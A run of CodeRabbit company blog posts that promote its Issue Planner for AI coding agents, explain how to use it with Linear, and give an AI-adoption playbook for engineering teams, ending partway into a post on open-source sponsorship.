Again and again, the same conclusion kept surfacing: the problem didn’t start in the code. It started before the code existed. Reviewing output was no longer enough. If we wanted to reduce rework, improve quality, and actually help teams move faster with AI, we had to move upstream, without abandoning what made review effective in the first place. Collaborative planning gives teams a way to align on intent before agents start executing, so reviews catch fewer surprises and you can actually ship faster. ## How CodeRabbit Issue Planner works ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dea51609d13b5ac5ba3271c03bc57ebc9e03a1c41e9e2d82de9c43126720ae42_0c5377c6c3.jpg) CodeRabbit Issue Planner connects directly to your issue tracker (we currently support Linear, Jira, and GitHub Issues) and helps teams plan *before* any code is written. 1. When an issue is created, CodeRabbit’s context engine automatically builds a **Coding Plan**. It outlines how the work should be approached, identifies which parts of the codebase are likely to change, and breaks complex requirements into clear phases and tasks that an AI coding agent can execute. 2. That plan is enriched with real context: past issues and PRs, organizational knowledge from tools like Notion or Confluence, and relevant details pulled directly from your codebase. 3. The result is a structured, editable plan and a high-quality prompt package, ready to run in your IDE or via CLI tools. 4. Before anything is generated, your team can review the plan, refine assumptions, and iterate on the prompt together. Every version is saved, so decisions and intent don’t get lost over time. 5. When you’re ready, CodeRabbit hands the finalized prompt off to the coding agent of your choice. Then, generation starts with clarity, not guesswork. The outcome: faster planning, better prompts, fewer misunderstandings, and a development process aligned around shared intent from the very beginning. 
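To make the shape of such a plan concrete, here is a minimal sketch of a versioned plan with phases, tasks, and explicit assumptions that renders to a prompt. It is an illustration only, not Issue Planner's actual data model or API: every class, field, and method name below (`CodingPlan`, `PlanVersion`, `revise`, `to_prompt`, and so on) is a hypothetical assumption.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Task:
    description: str
    files: tuple[str, ...] = ()  # files likely to change (hypothetical field)


@dataclass(frozen=True)
class Phase:
    name: str
    tasks: tuple[Task, ...]


@dataclass(frozen=True)
class PlanVersion:
    """An immutable snapshot, so earlier decisions are never overwritten."""
    assumptions: tuple[str, ...]
    phases: tuple[Phase, ...]


@dataclass
class CodingPlan:
    issue_id: str
    versions: list[PlanVersion] = field(default_factory=list)

    def revise(self, version: PlanVersion) -> int:
        """Save a new version and return its 1-based version number."""
        self.versions.append(version)
        return len(self.versions)

    def to_prompt(self) -> str:
        """Render the latest version as plain text for a coding agent."""
        latest = self.versions[-1]
        lines = [f"Issue: {self.issue_id}", "Assumptions:"]
        lines += [f"- {assumption}" for assumption in latest.assumptions]
        for phase in latest.phases:
            lines.append(f"Phase: {phase.name}")
            for task in phase.tasks:
                files = ", ".join(task.files) or "(files not yet identified)"
                lines.append(f"- {task.description} [{files}]")
        return "\n".join(lines)
```

Keeping each version as a frozen snapshot is one way to reflect the "every version is saved" idea: a reviewer can compare the assumptions in version 1 against version 2 instead of guessing what changed.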
## **Measure what actually matters** It’s easy to focus on the more talked-about parts of AI adoption. That’s why so many teams focus on things like model quality, speed, and how impressive the output looks in isolation. But the teams that succeed with AI aren’t the ones chasing the agent with the best benchmark score. They’re the ones refining their processes to reduce rework, minimize confusion, and keep alignment cheap by planning effectively together. In the AI era, coding is becoming easier. The real work is shifting left towards planning and, at CodeRabbit, we’re here to help. ***Learn more and*** [***try Issue Planner today!***](https://coderabbit.link/kenhuQw)

Issue Planner: Collaborative planning for teams using coding agents

Parth Gandhi — Tue, 10 Feb 2026 00:00:00 GMT

For decades, the software development lifecycle has followed a familiar timeline. You create an issue, assign the work, manually write the code, get several peers to review it, test it, and ship. Each step took a relatively predictable amount of time and effort. You could find efficiencies but only to a degree. Then, AI coding agents came and exploded that timeline. At CodeRabbit, we’ve seen firsthand how AI shifted the backlog from writing code to reviewing and testing code. That’s why we launched our [PR Reviews product](https://www.coderabbit.ai/). When AI also created the need to review code locally while working on code with an agent, we launched our [IDE](https://www.coderabbit.ai/ide) and [CLI](https://www.coderabbit.ai/cli) code review tools. Lately, we’ve been seeing another problem. With coding agents in the loop, writing code is no longer the slowest or most critical part of the process. Planning is. Intent is. Alignment is. ## Why we’re taking on planning… (Hint: We see a lot of slop in reviews) The cost of being even slightly unclear about things like scope, assumptions, or success criteria has huge implications later on in the workflow when agents are involved… like in reviews where we were seeing a lot of slop and rework required 👀. But it also means needing to iterate on prompts until the agent gets it right and extensively reworking generated content. What’s more, creating effective prompts with the right context and intent is time consuming, creates issues with adoption of AI tools and generates uneven outcomes across teams due to differences in prompting skills and approach. Increasingly, developers are hungry for ways to streamline the planning process and to shift collaboration left by reviewing prompts before code is written. 
That’s why we’re **launching the beta for CodeRabbit Issue Planner.** We’re leveraging the same industry-leading context engine we use in our code reviews to help teams create plans, automate the drafting of prompts, and collaborate to ensure alignment. ## The challenge: Planning in the AI era ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d284e2e411425cb28e3defa8c684b4855911fce546260678f32b68093ebcbf95_b8e89ab6bc.png) Today, teams spend more time prompting, re-prompting, and correcting AI-generated code than they ever expected. Prompts have grown longer as developers learned that being more specific helps increase output quality. Context is a big part of that but it has to be brought in from scattered docs, tickets, and Slack threads. If you don’t take the time to add it, agents make assumptions. Often not the right ones. The same goes for intent. Clear intent is the difference between your agent building the right thing and building “something.” The result of these prompting challenges is rework, “AI slop,” and frustration. Good prompting is complicated, time-consuming, and hard to do well. It requires: * Decomposing ambiguous problems * Specifying interfaces and acceptance criteria * Providing the right context at the right time * Building tight feedback loops * Designing for safety (including security, privacy, reliability) Meanwhile, on any team there are always some teammates who know how to guide agents well and others who don’t. That creates uneven output quality, more review overhead, and stalled adoption. After all, if you have to rework the code every time because your prompt isn’t specific enough, it often seems like it’s faster to just write the code yourself. ## How our Issue Planner works %[https://youtu.be/zHlgipben70] Our Issue Planner is a new workflow that happens collaboratively within your issue tracker and helps teams define scope, assumptions, and success criteria together – before any code is written. 
While other tools have tried to tackle AI planning, they’ve done it in a disconnected way that doesn’t allow for team alignment or doesn’t bring in the right context. With AI coding agents, planning can no longer live in people’s heads, scattered tickets, or half-remembered conversations. It has to be explicit, shared, reviewable, and machine-readable. Instead of treating prompting as a solo activity, our Issue Planner turns planning into a collaborative, reviewable step in your SDLC. ### Issue Planner walkthrough 1) CodeRabbit Issue Planner integrates with your issue tracker to help you plan where issues live (currently available in **Linear, Jira, GitLab Issues, and GitHub Issues**). 2) When an issue is created, CodeRabbit’s industry-leading context engine gets to work. It starts by creating a Coding Plan. That includes: * Sharing a high-level overview of how we will research and approach the task. * Pinpointing the files that need to change. * Breaking complex product requirements into multiple phases and tasks for an AI coding agent to execute. * Enriching each phase and task with context gathered from past issues and PRs, plus organizational context from tools like Notion, Confluence, and others. 3) This creates an editable, structured Coding Plan and a consumable prompt package that can be executed in IDE or CLI tools or shared with a coding agent. You can give feedback, refine the assumptions the tool made, and regenerate the plan. 4) You and your team can review and refine the prompt before any code is written. Versions of the prompt are stored for future reference and use. 5) When ready, CodeRabbit hands off the prompt to the coding agent of your choice. This process saves you time, automates planning, improves your prompt output, and allows your team to align on intent in order to streamline the rest of the software development lifecycle. 
[Learn more in Docs](https://docs.coderabbit.ai/issues/planning) ## How our Issue Planner helps teams ![](https://victorious-bubble-f69a016683.media.strapiapp.com/520106ebd615f6970bbc7a410da2165c6e5efb2fd6f1437969d856d79c32765f_8cb4eda7db.png) For the last several months, Issue Planner has been available to select CodeRabbit customers. Teams using it saw immediate improvements. * **Accelerated workflows:** CodeRabbit highlights both what needs to change and how to change it, so teams spend less time orienting themselves and more time actually shipping. Instead of reverse-engineering intent from a ticket or PR, engineers and agents start with a clear plan. * **Better intent → better output:** Agents receive explicit requirements, assumptions, and constraints up front. That clarity translates directly into higher-quality output, code that matches team standards, respects architecture decisions, and solves the right problem the first time. * **Increased AI adoption:** By leveling the playing field around prompting and planning, CodeRabbit makes agents usable for the whole team, not just power users. Less reliance on “AI whisperers,” fewer bottlenecks, and more consistent results across engineers. * **Reduced rework:** Clear plans mean fewer back-and-forth prompt cycles, less cleanup, and fewer PRs that are *technically correct but functionally wrong*. Teams spend less time undoing AI output and more time moving forward. * **Less slop:** Better planning reduces hallucinations, spaghetti code, and invented requirements. When agents are grounded in real context and agreed-upon intent, output stays focused, readable, and maintainable. * **Real collaboration:** Planning doesn’t happen in isolation. CodeRabbit Issue Planner brings humans into alignment before agents execute. That way, decisions are shared, assumptions are visible, and the whole team agrees on the plan before any code is written. ## But… why Collaborative Planning and prompt reviews? 
### Limitations of planning directly with agents Many AI coding tools encourage you to plan directly with an agent inside your editor, treating planning as a private, one-to-one interaction between a developer and an AI coding agent. In that scenario, requirements, assumptions, and constraints are only accessible to one person or are loosely implied in a prompt that no one else ever sees. AI coding agents also often don’t have the codebase context needed to create a comprehensive plan. When planning is rushed, under-specified, or lacking proper context, agents do what they’re designed to do: fill in the gaps. The result is often code that looks coherent but quietly drifts from team standards, architectural decisions, or product intent. Without shared visibility or early feedback, misalignment isn’t discovered until a PR review, after time has already been spent generating, fixing, and reworking code. ### Why we chose Collaborative Planning That’s why we chose a different direction: planning that’s collaborative, reviewable, and shared, so teams can agree on intent before agents ever start writing code. Collaborative planning turns intent into a shared artifact the whole team can align on before execution begins. By reviewing and refining prompts together via prompt reviews, assumptions become explicit, constraints are clarified, and decisions are made deliberately rather than inferred. Agents stop guessing and start executing against clear instructions, producing output that’s more predictable, usable, and aligned with how the team actually builds software. In this model, prompting is no longer a personal skill for a few power users. It becomes a team competency that scales, reduces rework, and allows agents to operate more reliably within agreed-upon boundaries. Another key benefit of planning collaboratively in your issue tracker is that developers aren’t locked into one agent or editor. They can choose the coding agents that work best for them. 
## What’s next? Roadmap for CodeRabbit Issue Planner We’re just getting started with our Issue Planner. We are building additional capabilities that will help developers collaborate more effectively, operationalize strong plans, and compound organizational knowledge over time. Here are just two things to look forward to: * **Deeper collaboration and better prompt review workflows:** We’ll be expanding support for more team collaboration directly within Issue Planner, including the ability to add discussion threads, activity and decision logs, and explicit approval checkpoints for plans and prompts. The goal is to make intent review a shared, auditable process, closer to a Google Docs–style collaboration experience than a one-off prompt. * **Prompt repos that function as “blueprints” for your code:** Our goal is to create a repo of the specs, design choices, and prompts that went into creating your codebase. This will function as a source of truth around the design directions and choices made and allow your team to more easily revisit decisions or tweak files without having to start from scratch. ## **Get started** ***CodeRabbit Issue Planner is available today in Linear, Jira, GitLab Issues, and GitHub Issues.*** [***Try it now.***](https://coderabbit.link/MW7YCkT)

How to effectively plan issues on Linear using CodeRabbit Issue Planner

Aleks Volochnev — Tue, 10 Feb 2026 00:00:00 GMT

There's a gap between a ticket and meaningful code. Your ticket says, "Add dark mode support." Great, but *what does that actually mean in code?* Which files need changes? What patterns does the codebase already use for theming, and are there shared utilities you should extend? Tickets describe the *what*. Someone still has to figure out the *how*, by diving into the codebase and tracing dependencies. That's the slow, unglamorous work that makes or breaks the implementation. You can't skip it, unless you enjoy rewriting things three times. "Ask your coding agent to plan it?" Sure, Claude or Cursor will happily generate one in ten seconds flat. But it looked at a dozen files max and definitely didn't notice that related issue your teammate closed three weeks ago (while you were on vacation), the one where the team decided on a specific state management approach for exactly this kind of thing. These fast plans can be confidently wrong in ways you won't discover until you're deep in implementation or even review. And even if the plan *were* solid, it lives in your agent's context window, so your colleague who knows the settings screen is about to be refactored never gets to weigh in. That’s where CodeRabbit Issue Planner comes in. It reads the issue, goes through relevant related issues for context, and combines that with its deep, continuously-built knowledge of your codebase: the source code dependency graph, established patterns, and previous architectural decisions. Out comes a Coding Plan: research results, design choices with rationale, phased tasks, and detailed agent-ready prompts you can hand off to whatever agent you use. Gathering the *right* context takes time, but I'd rather have a great plan in a few minutes than a confidently wrong one in a few seconds. 
![There is a special place in hell for people who write tickets like that, right?](https://victorious-bubble-f69a016683.media.strapiapp.com/4397e9e665876b231a35877b09fdca021e2aabbd25a0c4aa55d5111e15166fec_2be8a7b8f5.png) *There is a special place in hell for people who write tickets like that, right?* ## **Triggering a plan** The simplest way to get a plan is to comment @coderabbitai plan on an issue. A few minutes later, CodeRabbit replies with a link to your Coding Plan. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c8b5d71236befea9c7612435d57bee878d5f14b53697a881ce6929e4f254d140_a6862770dc.png) *My planning process: one comment, one coffee, one plan.* But the real power comes from Auto-Planning. In the CodeRabbit web app, go to the **Plans** tab and set up rules that automatically trigger planning when issues match certain conditions. You can filter by issue type, labels, assignee, or status, and combine them however you like. For example: "Plan every bug assigned to me that moves to In Progress." Set it up once, and every time you pick up a ticket, the plan is already waiting for you. One more thing: since Linear issues aren't tied to a specific repository, CodeRabbit needs to figure out which codebase to analyze. It can usually detect this on its own, but the most reliable approach is to specify the repository directly in your planning rule. No guessing, no extra comments. ![IF (ready-for-plan) THEN (rabbit does the planning) ELSE (you do the planning at 2am)](https://victorious-bubble-f69a016683.media.strapiapp.com/ceb67ee70c57f47ccb7db05ffa59ea4ad3893c52073d66ba066e10f5c9fa17e5_4a80d348db.png) *IF (ready-for-plan) THEN (rabbit does the planning) ELSE (you do the planning at 2am)* ## **What's in a plan** The plan lives in the CodeRabbit web app. Click the link in CodeRabbit's comment on the issue to open it. 
Here's what you'll find: ### **Summary** A concise overview of the implementation approach, tailored to your architecture and conventions. ### **Research** Deep codebase analysis: relevant files, existing patterns, dependencies, and architectural decisions that affect this work. This is the context you'd otherwise spend an hour gathering manually (or that your coding agent would skip entirely). ### **Design Choices** For each significant decision, you get the concern, the options that were considered, and which option was chosen, along with the rationale. "Three-way selector (light/dark/system)" instead of a simple toggle? Here's why. Creating a dedicated themes/ directory for the visuals? Here's the reasoning. These are the decisions worth reviewing with your team before anyone writes a line of code. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/882d822fc4d73a758015c65a1164cf5ae94688c57e32af3a5e7045e293d2cce2_fc9db34a0c.png) *‘The hour of reading code before writing code’ part, done for you* ### **Phased Tasks** The implementation broken into logical, shippable chunks. Each phase groups related changes that make sense to build and test together. Phase 1 might lay the foundation (AsyncStorage and ThemeProvider). Phase 2 integrates it at the app level. Phase 3 migrates existing components. ![Your agent's favorite kind of prompt: the very specific one.](https://victorious-bubble-f69a016683.media.strapiapp.com/6a3365a94c0a88eeb9813c7814096c512585a8caafe12219bf91f49010684a12_f0896bd3c8.png) *Your agent's favorite kind of prompt: the very specific one.* ### **Agent-Ready Prompts** Machine-readable instructions for your coding agent, available per phase or as a combined prompt. Not vague suggestions, but real, applicable instructions. They reference specific files, follow your project's patterns, and include the edge cases your agent should handle. 
![Specific file paths, actual type definitions: no more “can I haz dark mode pls?”](https://victorious-bubble-f69a016683.media.strapiapp.com/1f2c2171d0b06ac4a6830508b63343438e1160a13992469f36740a1f7b7e7311_84e99cea51.png) *Specific file paths, actual type definitions: no more “can I haz dark mode pls?”* ### **Refining through chat** The plan editor has a chat panel on the right side. Use it to ask questions about the plan, challenge design choices, or request changes. Don't like that the plan chose option 2 for a design decision? Tell CodeRabbit you'd prefer option 3, and explain why. Want more detail on a specific step? Just ask. When you're happy with the feedback you've given, hit **Redo Plan**. CodeRabbit regenerates the plan incorporating your notes. Every version is preserved, so if a re-plan goes sideways, you can roll back to a previous version. For smaller issues, your own knowledge might be enough. For anything non-trivial, I'd encourage sharing the plan with your team. Send the link to your colleagues and let them poke holes in it. A Product Owner reviewing the plan *before* implementation starts can save everyone a painful "that's not what I meant" moment a week later. Plans are collaborative by design: anyone in your organization can view them, chat about them, and trigger re-plans. ![Rubber ducking except the duck answers back](https://victorious-bubble-f69a016683.media.strapiapp.com/1eabaed80b07f49456a9407907aa0d5fe87b4deb8b5937a2aaa4a779ac454398_2a759eb363.png) *Rubber ducking except the duck answers back* ## **Handing off to your coding agent** Once you're satisfied with the plan, select the phases you want to work on and click **IDE Handoff**. If you have the CodeRabbit IDE extension installed (VS Code, Cursor, Windsurf, or any compatible editor), the agentic prompts land directly in your coding agent's input field, ready to execute. Pick your IDE from the dropdown and go. No IDE extension? 
Hit **Copy prompt** to grab the prompts as text and paste them into Claude Code, GitHub Copilot, or whatever tool you prefer. Same prompts, same quality, just a manual paste. ![Three down, your favorite is [probably] next.](https://victorious-bubble-f69a016683.media.strapiapp.com/2a22c1a980b2e0b0d150955dbf4069bd729c41c3ffdee694ed282e4493212ccc_16a361eb2e.png) *Three down, your favorite is \[probably\] next.* ## **Getting started** If you're new to CodeRabbit, start by installing it on your repositories (GitHub, GitLab, Bitbucket, or Azure DevOps are all supported). The [quickstart guide](https://docs.coderabbit.ai/getting-started/quickstart) walks you through the setup in under five minutes. Already using CodeRabbit for code reviews? You're halfway there. Head to the CodeRabbit dashboard, go to **Integrations**, and connect your Linear workspace. This unlocks Issue Planner, but it's also worth doing for code review. CodeRabbit will validate your pull requests against the acceptance criteria in linked Linear issues, catching gaps that people often miss. Once Linear is connected, comment @coderabbitai plan on any issue. Your first Coding Plan will be ready in a few minutes. From there, set up Auto-Planning rules so plans are waiting for you before you even open the ticket. ## **Why CodeRabbit Issue Planner** Linear handles the *what* and *when*. CodeRabbit Issue Planner now handles the *how*. Unlike asking your coding agent for a quick plan, you get one that's actually grounded in your codebase, informed by related issues, and reviewed by your team before a single line of code is written. CodeRabbit is free for open-source projects and comes with a free trial for private repositories. Give it a spin on a real issue and see how the plan compares to what you'd get from your agent alone. ***Learn more and*** [***try Issue Planner today.***](https://coderabbit.link/cfr8wBf)

It's not enough to buy an AI subscription: A realistic adoption playbook

Aleks Volochnev — Fri, 06 Feb 2026 00:00:00 GMT

> *A decade ago I led a DevOps transformation in a German company: clouds, containers, a lot of automation. I thought tooling would be the hardest part of the transition: little did I know. Neither Kubernetes configs nor CI/CD pipelines were the hard part, getting people to believe in the change and accept new processes were. We cut time-to-market from months to weeks and saved millions by moving from manual to automated testing, but only after winning hearts and minds.* ***AI adoption is the same story, different decade.*** Every week, I talk to teams who bought [Google](https://www.coderabbit.ai/blog/gemini-3-for-code-related-tasks-the-dense-engineer) or [Claude](https://docs.coderabbit.ai/cli/claude-code-integration) subscriptions expecting magic. What they got was a glitchy autocomplete and a lot of confusing results. The gap between "we have AI tools" and "we ship better software faster because of AI" is wider than vendors want you to believe. I've collected the pitfalls people forget to consider or completely misunderstand when adopting AI-assisted development. If you're planning to make the jump or have tried and weren't excited with the results, this is for you. There's no magic button: every process change requires understanding and planning. Consider this a playbook born from many failures (and some tears). ## Pitfall 1: Can your team actually use these AI tools? (Skill gap) *You can buy a Formula 1 racing car, but putting your Uber driver behind the wheel without track training won't get you to the office, more likely, to the hospital.* **The problem:** Using AI looks simple. Just chat with the bot until it’s done, right? This simplicity is very deceptive! Prompting is a skill and bad prompts produce bad output, no matter how expensive your fancy [Opus 4.5](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect) is. Knowing how to use AI (and when not to use it at all) is expertise that takes time to develop. 
Without it, you're paying for a car nobody knows how to drive. **Quick diagnostic:** Ask your engineers: "What's the system prompt? Context poisoning?" If you get blank stares, you have a skill gap. Understanding context engineering is the key to getting real value from AI tools and most developers haven't been taught it. There are still plenty of people who do not understand the difference between an agent and the LLM model it uses under the hood! **What helps** * Start with a brief skill assessment. Who's already using AI tools effectively? These people will be invaluable in this journey! * Dedicate actual learning time and host or run a course. "Figure it out on your own," isn't a training program. * Let early adopters lead. Peer recommendations beat external trainers every time. Internal lunch-and-learns work better than vendor webinars (and cost less!) * Team up early adopters with AI novices. Pair programming sessions where experienced users tackle real problems on your own project - nothing can beat that. ## Pitfall 2: Who chose this tool... And why!? (the top-down tool problem) *"Yesterday we bought XYZ for everyone. Use it, you ungrateful creatures."* **The problem:** Management picks a tool based on marketing demos, mandates it overnight. No evaluation against the team's actual workflow. Developers feel unheard. The tool might not fit the stack, the workflow, or individual preferences. Resistance grows among the team and now the pushback is about autonomy, not the tool itself. In these cases, adoption fails, the budget gets wasted, the team is annoyed. To make matters worse, the landscape is indeed confusing. 
There are full AI-native [IDEs](https://www.coderabbit.ai/ide) ([Cursor](https://www.coderabbit.ai/cursor), [Windsurf](https://www.coderabbit.ai/windsurf)), extensions for existing IDEs (Roo Code, [GitHub Copilot](https://www.coderabbit.ai/blog/github-copilot-best-practices-10-tips-and-tricks-that-actually-help), Cline), provider-locked versus provider-agnostic options, subscription-based versus consumption-based, chat interfaces versus inline completion versus agentic workflows. No single "best" choice exists. If you want me to tell you "just use X and Y" - my apologies but I won’t do that. I'm not here to sell you some agents. It's a decision you need to make together with your team. **Quick diagnostic:** Run an anonymous poll: are developers satisfied with AI tooling? Did they have a voice in AI tool selection? "Enterprise decided for us" doesn't drive adoption. **What helps** * Ask what your team is already using. Some certainly are already deep into AI adoption either for your projects or their hobby projects. * Run lightning demos where team members show different tools for 5 minutes each. * Invest time in tool selection. Make sure to show and demo options and let the team have a real voice. * Accept that the "best" solution depends on stack, workflow, budget, and personal preference. ## Pitfall 3: Do you really trust this code? (blind trust trap) *AI is like an overly confident intern: sounds right, might be deadly wrong.* **The problem:** AI-generated code often looks correct and passes superficial reviews. Our own data shows AI-generated code [has 1.7x more bugs](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) than human-written code. Subtle issues like security holes, performance problems, and edge cases can be there and will be there, but verifying someone else's code is cognitively hard, and the more code AI produces, the worse this gets. So, people tend to skip verification completely or do it too shallowly. 
"It looks very solid, so it's probably fine" becomes the default, and many programmers tend to push to upstream without proper validation. I explain it in detail in my recent post about how [it's harder to read code than to write it](https://www.coderabbit.ai/blog/its-harder-to-read-code-than-to-write-it-especially-when-ai-writes-it). **The story with bugs:** The earlier you catch them, the cheaper they are to fix. Something comes up while already working on a ticket? A developer is already on the task, with (hopefully) a clear understanding of the requirements, the context, and more. Here, it's a minute to make it right. Let this get through to the pull request, or even worse, to production, and fixing can cost you hours or days of debugging, not to mention unhappy customers. Try to catch potential issues before they reach a formal pull request review, since it's cheaper and faster. **Pre-commit review** is also a highly underestimated part of modern AI-assisted development and many devs don't realize how much it would save their teams. Subscribe, since I'll talk much more about it in future posts! **Quick diagnostic:** Blind trust shows up in one of two ways. Look at your incident reports and your PR metrics side by side. More production bugs recently while AI usage went up? That's blind trust sneaking through. Alternatively, if production is stable but your average "reviewer requested changes" shot through the roof and time-to-merge doubled, congrats, your reviewers are catching the AI-generated mess (but they're drowning in it). **What helps** * Devs can't just "write and push" anymore. Whatever AI wrote is to be thoroughly reviewed - as early as possible. * Treat *pre-commit review* as standard practice and incorporate it into the training program and the overall working culture. * Run automated checks, but not just with linters. Let AI review what another AI wrote. 
We have [a great tool with a generous free plan!](https://www.coderabbit.ai/ide) * Build a culture of healthy skepticism (not paranoia). The goal isn't to distrust AI, it's to verify before you trust. ![Exposed GitHub Personal Access Token in version control](https://victorious-bubble-f69a016683.media.strapiapp.com/ec59a6b8974087e4584236731a4e9d5a4579b9e91a29c77ed4e59ba1e3b11f78_a46dd84479.png) ## Pitfall 4: More code that needs stricter reviews. Same team. See the problem? *More cars on the highway, and everyone's trying to exit through the same single-lane ramp.* **The problem:** Individual developer velocity goes up when you adopt AI coding tools. But that also means PRs pile up waiting for review. Reviewers, then, become the constraint. AI makes it easy to write more code, and larger PRs mean harder reviews. Harder reviews, in turn, mean either a slower shipping pace or production incidents, or both. **Quick diagnostic:** Check your PR metrics: has average time-to-review increased in the last 3 months while code volume doubled? That's a bottleneck. Or did time-to-review stay the same despite more code? That might be even worse, because fast shallow reviews lead to production incidents. You want fast and thorough. **What helps** * Automated [first-pass AI reviews](https://www.coderabbit.ai/#features) with immediate feedback. * Fast feedback means the code author still has context; slow human review hours or days later means they've already forgotten half the details. * Authors address automated feedback before a dedicated human reviewer even sees the PR. * Human reviewers focus on architecture, logic, and business context, as well as other things that require judgment. * Faster feedback loops lead to faster merges. 
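The quick diagnostic for this pitfall can be sketched as a small script. This is a minimal illustration, not a standard metric: the `PullRequest` record, the `diagnose` function, and the `growth_threshold` cutoff are all hypothetical names and values, and the data would have to come from whatever PR analytics your team already has.

```python
from dataclasses import dataclass
from statistics import median


@dataclass
class PullRequest:
    hours_to_first_review: float  # time from opening the PR to the first review
    lines_changed: int            # additions plus deletions


def diagnose(previous: list[PullRequest], recent: list[PullRequest],
             growth_threshold: float = 1.5) -> str:
    """Compare two periods of PR data and name the likely review problem.

    growth_threshold is an assumed cutoff (1.5 means 50% growth), not a standard.
    """
    if not previous or not recent:
        raise ValueError("both periods need at least one pull request")

    prev_volume = sum(pr.lines_changed for pr in previous)
    recent_volume = sum(pr.lines_changed for pr in recent)
    prev_wait = median(pr.hours_to_first_review for pr in previous)
    recent_wait = median(pr.hours_to_first_review for pr in recent)

    volume_grew = recent_volume >= growth_threshold * prev_volume
    wait_grew = recent_wait >= growth_threshold * prev_wait

    if volume_grew and wait_grew:
        return "bottleneck: reviews are slowing down as code volume grows"
    if volume_grew:
        return "risk: volume grew but review time did not, reviews may be shallow"
    return "no obvious review bottleneck"
```

Medians are used here rather than averages so that one PR that sat open over a holiday does not dominate the result; that is a design preference, and an average would match the wording of the diagnostic more literally.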
![Move state initialization to componentDidMount to avoid side effects during render](https://victorious-bubble-f69a016683.media.strapiapp.com/af8b0acff168eaeafdb1e5a2a111547e6e6946acc922d9d852189db3017e9982_aa4c5d384a.png) ***NOTE: AI reviews save significant time and speed up delivery, but they can't and won't replace proper human reviews!*** ## Pitfall 5: Where's the blueprint, Lebowski? (context starvation problem) *AI without context is like a creative contractor without blueprints. It definitely will build something... Most likely not what you needed.* **The problem:** AI tools are only as good as the context they receive. Human developers recover missing context naturally. They get it from things like Slack huddles, coffee machine conversations, and hallway chats. AI can't do that; instead, it will confidently "invent" the missing parts, and you don't want that. Disconnected tools mean lost context at every handoff. Tribal knowledge (the stuff everyone knows but nobody wrote down) never makes it into an AI’s context. **Quick diagnostic:** Open your last five issues. Do they have acceptance criteria and clear problem statements, or just "fix the bug" and a link that expired three months ago? Check your documentation: when's the last time anyone updated the architecture docs? If the README still mentions the framework you migrated away from two years ago, AI tools are navigating using 17th-century maps. **What helps** * Well-written issues with acceptance criteria help make good prompts. * [Linked issues in PRs](https://docs.coderabbit.ai/guides/linked-issues), so that context flows through to the AI. Then, AI reviews can validate not only the code but also that the code meets requirements and acceptance criteria. * Codebase documentation that AI can actually access and reference. * Team knowledge captured in [an accessible form](https://docs.coderabbit.ai/guides/learnings), not just in people's heads. 
![Missing platform availability check required by Linear](https://victorious-bubble-f69a016683.media.strapiapp.com/36102ea6dae0c924826cf4bef2e4439cd41ff263baa9decb70e337300f64bf68_6368f02706.png) ## Pitfall 6: "Am I getting fired?" (the people problem) *"Someone's getting fired after this transition."* **The problem:** Fear and resistance, sometimes explicit, often passive. Junior devs worry about job security and tend to over-rely on AI. Senior devs feel their expertise is devalued and often resist (a common comment you’ll find here is, "I'm faster without it"). AI won't replace developers, but developers are scared management still thinks it will and you won't get great results until your team sincerely supports the change, instead of quietly resisting it. Frederick the Great said soldiers should fear their officers more than the enemy. That might work well for 18th-century infantry charges, but it's a terrible model for modern software teams. Fear kills experimentation, hides problems, and drives your best people to update their LinkedIn. You're not running a Prussian army, so don't manage like you are. **Quick diagnostic:** The best approach is to lead bottom-up. Let the team own the initiative, run experiments (some will fail, that's fine), and iterate until you hit something that works. If you hire smart people, there is no need to dictate to them and, if you don't, AI won't help you. **What helps** * Clearly frame AI as an amplifier, not a replacement. * Let early adopters demonstrate value to peers. It's more credible than management saying, "just trust us." * Celebrate what humans do better: judgment, creativity, and understanding are good examples. They are also what the business actually needs. * Involve the team in tool selection and workflow design. * Skeptics often have valid concerns worth addressing. Listen to them. ## Where to start These challenges don't exist in isolation. Training gaps lead to blind trust. 
Top-down mandates create people problems, making the team resist change. Context starvation makes review bottlenecks worse. Start where it hurts most. For most teams, that's either the skill gap, the blind trust problem (bugs slipping through) or the review bottleneck (PRs piling up). Each of these challenges deserves deeper treatment. We'll dig into pre-commit and pull request review automation strategies and change management in future posts. For now, the key insight is the same one I learned a decade ago: the tools are actually the easy part. The habits, the culture, the workflows - that's where transformations actually happen. **Got thoughts on this? Tell me! Have your own AI adoption stories, shiny wins, or spectacular failures?** [**Hit me up**](https://www.linkedin.com/in/aleks-volochnev/)**! I read and respond to everything. Best insights come from readers who push back or share their own disasters.** *Want to see automated code review in action? Check out how different projects like* [*Langflow*](https://www.coderabbit.ai/case-studies/langflow-boosts-merge-confidence-by-50-with-coderabbit) *and* [*Clerk*](https://www.coderabbit.ai/case-studies/inside-clerks-40-percent-faster-merge-workflow-with-coderabbit) [*use CodeRabbit*](https://app.coderabbit.ai/login???free-trial) *to catch issues before they reach human reviewers.*

We are committed to supporting open source: Distributed $600,000 to open source maintainers in 2025

Santosh Yadav — Wed, 04 Feb 2026 00:00:00 GMT

CodeRabbit recognizes the growing need to support open source software (OSS), especially as AI accelerates the development landscape. While AI makes writing code faster and increases the frequency of pull requests, the time and effort of maintainers remain invaluable. Most open source projects rely on a small number of developers who manage these projects within their limited time. To address this, we provide OSS projects access to CodeRabbit for free. We’ve also made a commitment to giving the OSS community [$1 million in sponsorships.](https://www.coderabbit.ai/blog/coderabbit-commits-1-million-to-open-source) ## Open source funding is broken, we can fix it together At CodeRabbit, we view our support for open source as a vital investment in its future, rather than just "giving back." Open source software forms the foundation upon which most organizations build successful products. We rely on many OSS projects, including [**pnpm**](https://github.com/pnpm/pnpm), [**Biome**](https://github.com/biomejs/biome), and various React-based libraries. Our commitment is to ensure these projects remain sustainable for the long term, enabling widespread consumption and innovation. Critically, we want to make sure maintainers receive the necessary financial support to feel valued by the community and avoid burnout. Even with AI generating code, the use of OSS is not declining. In fact, as exemplified by the impact on major projects like [TailwindCSS](https://tailwindcss.com/) and [tldraw](https://www.tldraw.com/), AI is expected to significantly increase the download rates for widely used open source projects. We are proud to join the [open source pledge](https://opensourcepledge.com/join/) and formally commit to supporting open source software. ## CodeRabbit’s effort in 2025 In 2025, CodeRabbit demonstrated its strong commitment to the open-source community by distributing over $600,000 in sponsorships, in addition to offering a free 